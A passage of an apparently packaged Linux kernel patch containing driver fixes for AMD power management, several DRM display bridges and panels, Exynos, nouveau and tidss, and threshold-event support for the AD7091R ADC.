+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -24,6 +24,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/pci.h>
++#include <linux/power_supply.h>
+ #include <linux/reboot.h>
+ 
+ #include "amdgpu.h"
+@@ -731,16 +732,8 @@ static int smu_late_init(void *handle)
+ 	 * handle the switch automatically. Driver involvement
+ 	 * is unnecessary.
+ 	 */
+-	if (!smu->dc_controlled_by_gpio) {
+-		ret = smu_set_power_source(smu,
+-					   adev->pm.ac_power ? SMU_POWER_SOURCE_AC :
+-					   SMU_POWER_SOURCE_DC);
+-		if (ret) {
+-			dev_err(adev->dev, "Failed to switch to %s mode!\n",
+-				adev->pm.ac_power ? "AC" : "DC");
+-			return ret;
+-		}
+-	}
++	adev->pm.ac_power = power_supply_is_system_supplied() > 0;
++	smu_set_ac_dc(smu);
+ 
+ 	if ((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 1)) ||
+ 	    (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 3)))
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index d490b571c8ffa..2e061a74a0b7e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1467,10 +1467,12 @@ static int smu_v11_0_irq_process(struct amdgpu_device *adev,
+ 			case 0x3:
+ 				dev_dbg(adev->dev, "Switched to AC mode!\n");
+ 				schedule_work(&smu->interrupt_work);
++				adev->pm.ac_power = true;
+ 				break;
+ 			case 0x4:
+ 				dev_dbg(adev->dev, "Switched to DC mode!\n");
+ 				schedule_work(&smu->interrupt_work);
++				adev->pm.ac_power = false;
+ 				break;
+ 			case 0x7:
+ 				/*
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 1b0fb93539ec4..f3257cf4b06f2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1415,10 +1415,12 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 			case 0x3:
+ 				dev_dbg(adev->dev, "Switched to AC mode!\n");
+ 				smu_v13_0_ack_ac_dc_interrupt(smu);
++				adev->pm.ac_power = true;
+ 				break;
+ 			case 0x4:
+ 				dev_dbg(adev->dev, "Switched to DC mode!\n");
+ 				smu_v13_0_ack_ac_dc_interrupt(smu);
++				adev->pm.ac_power = false;
+ 				break;
+ 			case 0x7:
+ 				/*
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index cf86cc05b7fca..5f8137e9cfd7a 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1742,6 +1742,7 @@ static ssize_t anx7625_aux_transfer(struct drm_dp_aux *aux,
+ 	u8 request = msg->request & ~DP_AUX_I2C_MOT;
+ 	int ret = 0;
+ 
++	mutex_lock(&ctx->aux_lock);
+ 	pm_runtime_get_sync(dev);
+ 	msg->reply = 0;
+ 	switch (request) {
+@@ -1758,6 +1759,7 @@ static ssize_t anx7625_aux_transfer(struct drm_dp_aux *aux,
+ 					msg->size, msg->buffer);
+ 	pm_runtime_mark_last_busy(dev);
+ 	pm_runtime_put_autosuspend(dev);
++	mutex_unlock(&ctx->aux_lock);
+ 
+ 	return ret;
+ }
+@@ -2454,7 +2456,9 @@ static void anx7625_bridge_atomic_disable(struct drm_bridge *bridge,
+ 	ctx->connector = NULL;
+ 	anx7625_dp_stop(ctx);
+ 
+-	pm_runtime_put_sync(dev);
++	mutex_lock(&ctx->aux_lock);
++	pm_runtime_put_sync_suspend(dev);
++	mutex_unlock(&ctx->aux_lock);
+ }
+ 
+ static enum drm_connector_status
+@@ -2648,6 +2652,7 @@ static int anx7625_i2c_probe(struct i2c_client *client)
+ 
+ 	mutex_init(&platform->lock);
+ 	mutex_init(&platform->hdcp_wq_lock);
++	mutex_init(&platform->aux_lock);
+ 
+ 	INIT_DELAYED_WORK(&platform->hdcp_work, hdcp_check_work_func);
+ 	platform->hdcp_workqueue = create_workqueue("hdcp workqueue");
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.h b/drivers/gpu/drm/bridge/analogix/anx7625.h
+index 14f33d6be289f..239956199e1b9 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.h
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.h
+@@ -471,6 +471,8 @@ struct anx7625_data {
+ 	struct workqueue_struct *hdcp_workqueue;
+ 	/* Lock for hdcp work queue */
+ 	struct mutex hdcp_wq_lock;
++	/* Lock for aux transfer and disable */
++	struct mutex aux_lock;
+ 	char edid_block;
+ 	struct display_timing dt;
+ 	u8 display_timing_valid;
+diff --git a/drivers/gpu/drm/bridge/nxp-ptn3460.c b/drivers/gpu/drm/bridge/nxp-ptn3460.c
+index 0851101a8c724..8686b20ac317d 100644
+--- a/drivers/gpu/drm/bridge/nxp-ptn3460.c
++++ b/drivers/gpu/drm/bridge/nxp-ptn3460.c
+@@ -54,13 +54,13 @@ static int ptn3460_read_bytes(struct ptn3460_bridge *ptn_bridge, char addr,
+ 	int ret;
+ 
+ 	ret = i2c_master_send(ptn_bridge->client, &addr, 1);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to send i2c command, ret=%d\n", ret);
+ 		return ret;
+ 	}
+ 
+ 	ret = i2c_master_recv(ptn_bridge->client, buf, len);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to recv i2c data, ret=%d\n", ret);
+ 		return ret;
+ 	}
+@@ -78,7 +78,7 @@ static int ptn3460_write_byte(struct ptn3460_bridge *ptn_bridge, char addr,
+ 	buf[1] = val;
+ 
+ 	ret = i2c_master_send(ptn_bridge->client, buf, ARRAY_SIZE(buf));
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		DRM_ERROR("Failed to send i2c command, ret=%d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/drivers/gpu/drm/bridge/parade-ps8640.c b/drivers/gpu/drm/bridge/parade-ps8640.c
+index 083337a279665..09737acc2cf41 100644
+--- a/drivers/gpu/drm/bridge/parade-ps8640.c
++++ b/drivers/gpu/drm/bridge/parade-ps8640.c
+@@ -106,6 +106,7 @@ struct ps8640 {
+ 	struct device_link *link;
+ 	bool pre_enabled;
+ 	bool need_post_hpd_delay;
++	struct mutex aux_lock;
+ };
+ 
+ static const struct regmap_config ps8640_regmap_config[] = {
+@@ -353,11 +354,20 @@ static ssize_t ps8640_aux_transfer(struct drm_dp_aux *aux,
+ 	struct device *dev = &ps_bridge->page[PAGE0_DP_CNTL]->dev;
+ 	int ret;
+ 
++	mutex_lock(&ps_bridge->aux_lock);
+ 	pm_runtime_get_sync(dev);
++	ret = _ps8640_wait_hpd_asserted(ps_bridge, 200 * 1000);
++	if (ret) {
++		pm_runtime_put_sync_suspend(dev);
++		goto exit;
++	}
+ 	ret = ps8640_aux_transfer_msg(aux, msg);
+ 	pm_runtime_mark_last_busy(dev);
+ 	pm_runtime_put_autosuspend(dev);
+ 
++exit:
++	mutex_unlock(&ps_bridge->aux_lock);
++
+ 	return ret;
+ }
+ 
+@@ -476,7 +486,18 @@ static void ps8640_post_disable(struct drm_bridge *bridge)
+ 	ps_bridge->pre_enabled = false;
+ 
+ 	ps8640_bridge_vdo_control(ps_bridge, DISABLE);
++
++	/*
++	 * The bridge seems to expect everything to be power cycled at the
++	 * disable process, so grab a lock here to make sure
++	 * ps8640_aux_transfer() is not holding a runtime PM reference and
++	 * preventing the bridge from suspend.
++	 */
++	mutex_lock(&ps_bridge->aux_lock);
++
+ 	pm_runtime_put_sync_suspend(&ps_bridge->page[PAGE0_DP_CNTL]->dev);
++
++	mutex_unlock(&ps_bridge->aux_lock);
+ }
+ 
+ static int ps8640_bridge_attach(struct drm_bridge *bridge,
+@@ -657,6 +678,8 @@ static int ps8640_probe(struct i2c_client *client)
+ 	if (!ps_bridge)
+ 		return -ENOMEM;
+ 
++	mutex_init(&ps_bridge->aux_lock);
++
+ 	ps_bridge->supplies[0].supply = "vdd12";
+ 	ps_bridge->supplies[1].supply = "vdd33";
+ 	ret = devm_regulator_bulk_get(dev, ARRAY_SIZE(ps_bridge->supplies),
+diff --git a/drivers/gpu/drm/bridge/sii902x.c b/drivers/gpu/drm/bridge/sii902x.c
+index 878fb7d3732ba..6359d6f53a1b6 100644
+--- a/drivers/gpu/drm/bridge/sii902x.c
++++ b/drivers/gpu/drm/bridge/sii902x.c
+@@ -171,7 +171,6 @@ struct sii902x {
+ 	struct drm_connector connector;
+ 	struct gpio_desc *reset_gpio;
+ 	struct i2c_mux_core *i2cmux;
+-	struct regulator_bulk_data supplies[2];
+ 	bool sink_is_hdmi;
+ 	/*
+ 	 * Mutex protects audio and video functions from interfering
+@@ -1041,6 +1040,26 @@ static int sii902x_init(struct sii902x *sii902x)
+ 			return ret;
+ 	}
+ 
++	ret = sii902x_audio_codec_init(sii902x, dev);
++	if (ret)
++		return ret;
++
++	i2c_set_clientdata(sii902x->i2c, sii902x);
++
++	sii902x->i2cmux = i2c_mux_alloc(sii902x->i2c->adapter, dev,
++					1, 0, I2C_MUX_GATE,
++					sii902x_i2c_bypass_select,
++					sii902x_i2c_bypass_deselect);
++	if (!sii902x->i2cmux) {
++		ret = -ENOMEM;
++		goto err_unreg_audio;
++	}
++
++	sii902x->i2cmux->priv = sii902x;
++	ret = i2c_mux_add_adapter(sii902x->i2cmux, 0, 0, 0);
++	if (ret)
++		goto err_unreg_audio;
++
+ 	sii902x->bridge.funcs = &sii902x_bridge_funcs;
+ 	sii902x->bridge.of_node = dev->of_node;
+ 	sii902x->bridge.timings = &default_sii902x_timings;
+@@ -1051,19 +1070,13 @@ static int sii902x_init(struct sii902x *sii902x)
+ 
+ 	drm_bridge_add(&sii902x->bridge);
+ 
+-	sii902x_audio_codec_init(sii902x, dev);
++	return 0;
+ 
+-	i2c_set_clientdata(sii902x->i2c, sii902x);
++err_unreg_audio:
++	if (!PTR_ERR_OR_ZERO(sii902x->audio.pdev))
++		platform_device_unregister(sii902x->audio.pdev);
+ 
+-	sii902x->i2cmux = i2c_mux_alloc(sii902x->i2c->adapter, dev,
+-					1, 0, I2C_MUX_GATE,
+-					sii902x_i2c_bypass_select,
+-					sii902x_i2c_bypass_deselect);
+-	if (!sii902x->i2cmux)
+-		return -ENOMEM;
+-
+-	sii902x->i2cmux->priv = sii902x;
+-	return i2c_mux_add_adapter(sii902x->i2cmux, 0, 0, 0);
++	return ret;
+ }
+ 
+ static int sii902x_probe(struct i2c_client *client,
+@@ -1072,6 +1085,7 @@ static int sii902x_probe(struct i2c_client *client,
+ 	struct device *dev = &client->dev;
+ 	struct device_node *endpoint;
+ 	struct sii902x *sii902x;
++	static const char * const supplies[] = {"iovcc", "cvcc12"};
+ 	int ret;
+ 
+ 	ret = i2c_check_functionality(client->adapter,
+@@ -1122,38 +1136,22 @@ static int sii902x_probe(struct i2c_client *client,
+ 
+ 	mutex_init(&sii902x->mutex);
+ 
+-	sii902x->supplies[0].supply = "iovcc";
+-	sii902x->supplies[1].supply = "cvcc12";
+-	ret = devm_regulator_bulk_get(dev, ARRAY_SIZE(sii902x->supplies),
+-				      sii902x->supplies);
++	ret = devm_regulator_bulk_get_enable(dev, ARRAY_SIZE(supplies), supplies);
+ 	if (ret < 0)
+-		return ret;
+-
+-	ret = regulator_bulk_enable(ARRAY_SIZE(sii902x->supplies),
+-				    sii902x->supplies);
+-	if (ret < 0) {
+-		dev_err_probe(dev, ret, "Failed to enable supplies");
+-		return ret;
+-	}
++		return dev_err_probe(dev, ret, "Failed to enable supplies");
+ 
+-	ret = sii902x_init(sii902x);
+-	if (ret < 0) {
+-		regulator_bulk_disable(ARRAY_SIZE(sii902x->supplies),
+-				       sii902x->supplies);
+-	}
+-
+-	return ret;
++	return sii902x_init(sii902x);
+ }
+ 
+ static void sii902x_remove(struct i2c_client *client)
+-
+ {
+ 	struct sii902x *sii902x = i2c_get_clientdata(client);
+ 
+-	i2c_mux_del_adapters(sii902x->i2cmux);
+ 	drm_bridge_remove(&sii902x->bridge);
+-	regulator_bulk_disable(ARRAY_SIZE(sii902x->supplies),
+-			       sii902x->supplies);
++	i2c_mux_del_adapters(sii902x->i2cmux);
++
++	if (!PTR_ERR_OR_ZERO(sii902x->audio.pdev))
++		platform_device_unregister(sii902x->audio.pdev);
+ }
+ 
+ static const struct of_device_id sii902x_dt_ids[] = {
+diff --git a/drivers/gpu/drm/drm_plane.c b/drivers/gpu/drm/drm_plane.c
+index 33357629a7f52..7a4af43e2cd18 100644
+--- a/drivers/gpu/drm/drm_plane.c
++++ b/drivers/gpu/drm/drm_plane.c
+@@ -1382,6 +1382,7 @@ retry:
+ out:
+ 	if (fb)
+ 		drm_framebuffer_put(fb);
++	fb = NULL;
+ 	if (plane->old_fb)
+ 		drm_framebuffer_put(plane->old_fb);
+ 	plane->old_fb = NULL;
+diff --git a/drivers/gpu/drm/exynos/exynos5433_drm_decon.c b/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
+index 8155d7e650f1a..4bc5d9470acdf 100644
+--- a/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
++++ b/drivers/gpu/drm/exynos/exynos5433_drm_decon.c
+@@ -319,9 +319,9 @@ static void decon_win_set_bldmod(struct decon_context *ctx, unsigned int win,
+ static void decon_win_set_pixfmt(struct decon_context *ctx, unsigned int win,
+ 				 struct drm_framebuffer *fb)
+ {
+-	struct exynos_drm_plane plane = ctx->planes[win];
++	struct exynos_drm_plane *plane = &ctx->planes[win];
+ 	struct exynos_drm_plane_state *state =
+-		to_exynos_plane_state(plane.base.state);
++		to_exynos_plane_state(plane->base.state);
+ 	unsigned int alpha = state->base.alpha;
+ 	unsigned int pixel_alpha;
+ 	unsigned long val;
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_fimd.c b/drivers/gpu/drm/exynos/exynos_drm_fimd.c
+index ae6636e6658ec..529033b980b20 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_fimd.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_fimd.c
+@@ -662,9 +662,9 @@ static void fimd_win_set_bldmod(struct fimd_context *ctx, unsigned int win,
+ static void fimd_win_set_pixfmt(struct fimd_context *ctx, unsigned int win,
+ 				struct drm_framebuffer *fb, int width)
+ {
+-	struct exynos_drm_plane plane = ctx->planes[win];
++	struct exynos_drm_plane *plane = &ctx->planes[win];
+ 	struct exynos_drm_plane_state *state =
+-		to_exynos_plane_state(plane.base.state);
++		to_exynos_plane_state(plane->base.state);
+ 	uint32_t pixel_format = fb->format->format;
+ 	unsigned int alpha = state->base.alpha;
+ 	u32 val = WINCONx_ENWIN;
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_gsc.c b/drivers/gpu/drm/exynos/exynos_drm_gsc.c
+index 964dceb28c1eb..68ea92742b06b 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_gsc.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_gsc.c
+@@ -1342,7 +1342,7 @@ static int __maybe_unused gsc_runtime_resume(struct device *dev)
+ 	for (i = 0; i < ctx->num_clocks; i++) {
+ 		ret = clk_prepare_enable(ctx->clocks[i]);
+ 		if (ret) {
+-			while (--i > 0)
++			while (--i >= 0)
+ 				clk_disable_unprepare(ctx->clocks[i]);
+ 			return ret;
+ 		}
+diff --git a/drivers/gpu/drm/nouveau/nouveau_vmm.c b/drivers/gpu/drm/nouveau/nouveau_vmm.c
+index 67d6619fcd5ed..29b5dedf6db89 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_vmm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_vmm.c
+@@ -108,6 +108,9 @@ nouveau_vma_new(struct nouveau_bo *nvbo, struct nouveau_vmm *vmm,
+ 	} else {
+ 		ret = nvif_vmm_get(&vmm->vmm, PTES, false, mem->mem.page, 0,
+ 				   mem->mem.size, &tmp);
++		if (ret)
++			goto done;
++
+ 		vma->addr = tmp.addr;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index a163585a2a52b..ecd6238749f7a 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -975,6 +975,8 @@ static const struct panel_desc auo_b116xak01 = {
+ 	},
+ 	.delay = {
+ 		.hpd_absent = 200,
++		.unprepare = 500,
++		.enable = 50,
+ 	},
+ };
+ 
+@@ -1870,7 +1872,7 @@ static const struct edp_panel_entry edp_panels[] = {
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1062, &delay_200_500_e50, "B120XAN01.0"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1e9b, &delay_200_500_e50, "B133UAN02.1"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x1ea5, &delay_200_500_e50, "B116XAK01.6"),
+-	EDP_PANEL_ENTRY('A', 'U', 'O', 0x405c, &auo_b116xak01.delay, "B116XAK01"),
++	EDP_PANEL_ENTRY('A', 'U', 'O', 0x405c, &auo_b116xak01.delay, "B116XAK01.0"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x615c, &delay_200_500_e50, "B116XAN06.1"),
+ 	EDP_PANEL_ENTRY('A', 'U', 'O', 0x8594, &delay_200_500_e50, "B133UAN01.0"),
+ 
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 005377f58eb4a..b714ee1bcbaa3 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -3603,6 +3603,7 @@ static const struct panel_desc tianma_tm070jdhg30 = {
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ };
+ 
+ static const struct panel_desc tianma_tm070jvhg33 = {
+@@ -3615,6 +3616,7 @@ static const struct panel_desc tianma_tm070jvhg33 = {
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ };
+ 
+ static const struct display_timing tianma_tm070rvhg71_timing = {
+diff --git a/drivers/gpu/drm/tidss/tidss_crtc.c b/drivers/gpu/drm/tidss/tidss_crtc.c
+index cd3c43a6c8064..cb66a425dd200 100644
+--- a/drivers/gpu/drm/tidss/tidss_crtc.c
++++ b/drivers/gpu/drm/tidss/tidss_crtc.c
+@@ -170,13 +170,13 @@ static void tidss_crtc_atomic_flush(struct drm_crtc *crtc,
+ 	struct tidss_device *tidss = to_tidss(ddev);
+ 	unsigned long flags;
+ 
+-	dev_dbg(ddev->dev,
+-		"%s: %s enabled %d, needs modeset %d, event %p\n", __func__,
+-		crtc->name, drm_atomic_crtc_needs_modeset(crtc->state),
+-		crtc->state->enable, crtc->state->event);
++	dev_dbg(ddev->dev, "%s: %s is %sactive, %s modeset, event %p\n",
++		__func__, crtc->name, crtc->state->active ? "" : "not ",
++		drm_atomic_crtc_needs_modeset(crtc->state) ? "needs" : "doesn't need",
++		crtc->state->event);
+ 
+ 	/* There is nothing to do if CRTC is not going to be enabled. */
+-	if (!crtc->state->enable)
++	if (!crtc->state->active)
+ 		return;
+ 
+ 	/*
+diff --git a/drivers/iio/adc/ad7091r-base.c b/drivers/iio/adc/ad7091r-base.c
+index 0e5d3d2e9c985..76002b91c86a4 100644
+--- a/drivers/iio/adc/ad7091r-base.c
++++ b/drivers/iio/adc/ad7091r-base.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ #include <linux/iio/events.h>
+ #include <linux/iio/iio.h>
+ #include <linux/interrupt.h>
+@@ -28,6 +29,7 @@
+ #define AD7091R_REG_RESULT_CONV_RESULT(x)   ((x) & 0xfff)
+ 
+ /* AD7091R_REG_CONF */
++#define AD7091R_REG_CONF_ALERT_EN   BIT(4)
+ #define AD7091R_REG_CONF_AUTO   BIT(8)
+ #define AD7091R_REG_CONF_CMD    BIT(10)
+ 
+@@ -49,6 +51,27 @@ struct ad7091r_state {
+ 	struct mutex lock; /*lock to prevent concurent reads */
+ };
+ 
++const struct iio_event_spec ad7091r_events[] = {
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_RISING,
++		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
++				 BIT(IIO_EV_INFO_ENABLE),
++	},
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_FALLING,
++		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
++				 BIT(IIO_EV_INFO_ENABLE),
++	},
++	{
++		.type = IIO_EV_TYPE_THRESH,
++		.dir = IIO_EV_DIR_EITHER,
++		.mask_separate = BIT(IIO_EV_INFO_HYSTERESIS),
++	},
++};
++EXPORT_SYMBOL_NS_GPL(ad7091r_events, IIO_AD7091R);
++
+ static int ad7091r_set_mode(struct ad7091r_state *st, enum ad7091r_mode mode)
+ {
+ 	int ret, conf;
+@@ -168,8 +191,142 @@ unlock:
+ 	return ret;
+ }
+ 
++static int ad7091r_read_event_config(struct iio_dev *indio_dev,
++				     const struct iio_chan_spec *chan,
++				     enum iio_event_type type,
++				     enum iio_event_direction dir)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++	int val, ret;
++
++	switch (dir) {
++	case IIO_EV_DIR_RISING:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++				  &val);
++		if (ret)
++			return ret;
++		return val != AD7091R_HIGH_LIMIT;
++	case IIO_EV_DIR_FALLING:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++				  &val);
++		if (ret)
++			return ret;
++		return val != AD7091R_LOW_LIMIT;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int ad7091r_write_event_config(struct iio_dev *indio_dev,
++				      const struct iio_chan_spec *chan,
++				      enum iio_event_type type,
++				      enum iio_event_direction dir, int state)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++
++	if (state) {
++		return regmap_set_bits(st->map, AD7091R_REG_CONF,
++				       AD7091R_REG_CONF_ALERT_EN);
++	} else {
++		/*
++		 * Set thresholds either to 0 or to 2^12 - 1 as appropriate to
++		 * prevent alerts and thus disable event generation.
++		 */
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					    AD7091R_HIGH_LIMIT);
++		case IIO_EV_DIR_FALLING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					    AD7091R_LOW_LIMIT);
++		default:
++			return -EINVAL;
++		}
++	}
++}
++
++static int ad7091r_read_event_value(struct iio_dev *indio_dev,
++				    const struct iio_chan_spec *chan,
++				    enum iio_event_type type,
++				    enum iio_event_direction dir,
++				    enum iio_event_info info, int *val, int *val2)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++	int ret;
++
++	switch (info) {
++	case IIO_EV_INFO_VALUE:
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			ret = regmap_read(st->map,
++					  AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					  val);
++			if (ret)
++				return ret;
++			return IIO_VAL_INT;
++		case IIO_EV_DIR_FALLING:
++			ret = regmap_read(st->map,
++					  AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					  val);
++			if (ret)
++				return ret;
++			return IIO_VAL_INT;
++		default:
++			return -EINVAL;
++		}
++	case IIO_EV_INFO_HYSTERESIS:
++		ret = regmap_read(st->map,
++				  AD7091R_REG_CH_HYSTERESIS(chan->channel),
++				  val);
++		if (ret)
++			return ret;
++		return IIO_VAL_INT;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int ad7091r_write_event_value(struct iio_dev *indio_dev,
++				     const struct iio_chan_spec *chan,
++				     enum iio_event_type type,
++				     enum iio_event_direction dir,
++				     enum iio_event_info info, int val, int val2)
++{
++	struct ad7091r_state *st = iio_priv(indio_dev);
++
++	switch (info) {
++	case IIO_EV_INFO_VALUE:
++		switch (dir) {
++		case IIO_EV_DIR_RISING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_HIGH_LIMIT(chan->channel),
++					    val);
++		case IIO_EV_DIR_FALLING:
++			return regmap_write(st->map,
++					    AD7091R_REG_CH_LOW_LIMIT(chan->channel),
++					    val);
++		default:
++			return -EINVAL;
++		}
++	case IIO_EV_INFO_HYSTERESIS:
++		return regmap_write(st->map,
++				    AD7091R_REG_CH_HYSTERESIS(chan->channel),
++				    val);
++	default:
++		return -EINVAL;
++	}
++}
++
+ static const struct iio_info ad7091r_info = {
+ 	.read_raw = ad7091r_read_raw,
++	.read_event_config = &ad7091r_read_event_config,
++	.write_event_config = &ad7091r_write_event_config,
++	.read_event_value = &ad7091r_read_event_value,
++	.write_event_value = &ad7091r_write_event_value,
+ };
+ 
+ static irqreturn_t ad7091r_event_handler(int irq, void *private)
+@@ -232,6 +389,11 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	iio_dev->channels = chip_info->channels;
+ 
+ 	if (irq) {
++		ret = regmap_update_bits(st->map, AD7091R_REG_CONF,
++					 AD7091R_REG_CONF_ALERT_EN, BIT(4));
++		if (ret)
++			return ret;
++
+ 		ret = devm_request_threaded_irq(dev, irq, NULL,
+ 				ad7091r_event_handler,
+ 				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, iio_dev);
+@@ -243,7 +405,14 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	if (IS_ERR(st->vref)) {
+ 		if (PTR_ERR(st->vref) == -EPROBE_DEFER)
+ 			return -EPROBE_DEFER;
++
+ 		st->vref = NULL;
++		/* Enable internal vref */
++		ret = regmap_set_bits(st->map, AD7091R_REG_CONF,
++				      AD7091R_REG_CONF_INT_VREF);
++		if (ret)
++			return dev_err_probe(st->dev, ret,
++					     "Error on enable internal reference\n");
+ 	} else {
+ 		ret = regulator_enable(st->vref);
+ 		if (ret)
+diff --git a/drivers/iio/adc/ad7091r-base.h b/drivers/iio/adc/ad7091r-base.h
+index 509748aef9b19..b9e1c8bf3440a 100644
+--- a/drivers/iio/adc/ad7091r-base.h
++++ b/drivers/iio/adc/ad7091r-base.h
+@@ -8,6 +8,12 @@
+ #ifndef __DRIVERS_IIO_ADC_AD7091R_BASE_H__
+ #define __DRIVERS_IIO_ADC_AD7091R_BASE_H__
+ 
++#define AD7091R_REG_CONF_INT_VREF	BIT(0)
++
++/* AD7091R_REG_CH_LIMIT */
++#define AD7091R_HIGH_LIMIT		0xFFF
++#define AD7091R_LOW_LIMIT		0x0
++
+ struct device;
+ struct ad7091r_state;
+ 
+@@ -17,6 +23,8 @@ struct ad7091r_chip_info {
+ 	unsigned int vref_mV;
+ };
+ 
++extern const struct iio_event_spec ad7091r_events[3];
++
+ extern const struct regmap_config ad7091r_regmap_config;
+ 
+ int ad7091r_probe(struct device *dev, const char *name,
+diff --git a/drivers/iio/adc/ad7091r5.c b/drivers/iio/adc/ad7091r5.c
+index 47f5763023a40..12d475463945d 100644
+--- a/drivers/iio/adc/ad7091r5.c
++++ b/drivers/iio/adc/ad7091r5.c
+@@ -12,26 +12,6 @@
+ 
+ #include "ad7091r-base.h"
+ 
+-static const struct iio_event_spec ad7091r5_events[] = {
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_RISING,
+-		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
+-				 BIT(IIO_EV_INFO_ENABLE),
+-	},
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_FALLING,
+-		.mask_separate = BIT(IIO_EV_INFO_VALUE) |
+-				 BIT(IIO_EV_INFO_ENABLE),
+-	},
+-	{
+-		.type = IIO_EV_TYPE_THRESH,
+-		.dir = IIO_EV_DIR_EITHER,
+-		.mask_separate = BIT(IIO_EV_INFO_HYSTERESIS),
+-	},
+-};
+-
+ #define AD7091R_CHANNEL(idx, bits, ev, num_ev) { \
+ 	.type = IIO_VOLTAGE, \
+ 	.info_mask_separate = BIT(IIO_CHAN_INFO_RAW), \
+@@ -44,10 +24,10 @@ static const struct iio_event_spec ad7091r5_events[] = {
+ 	.scan_type.realbits = bits, \
+ }
+ static const struct iio_chan_spec ad7091r5_channels_irq[] = {
+-	AD7091R_CHANNEL(0, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(1, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(2, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
+-	AD7091R_CHANNEL(3, 12, ad7091r5_events, ARRAY_SIZE(ad7091r5_events)),
++	AD7091R_CHANNEL(0, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
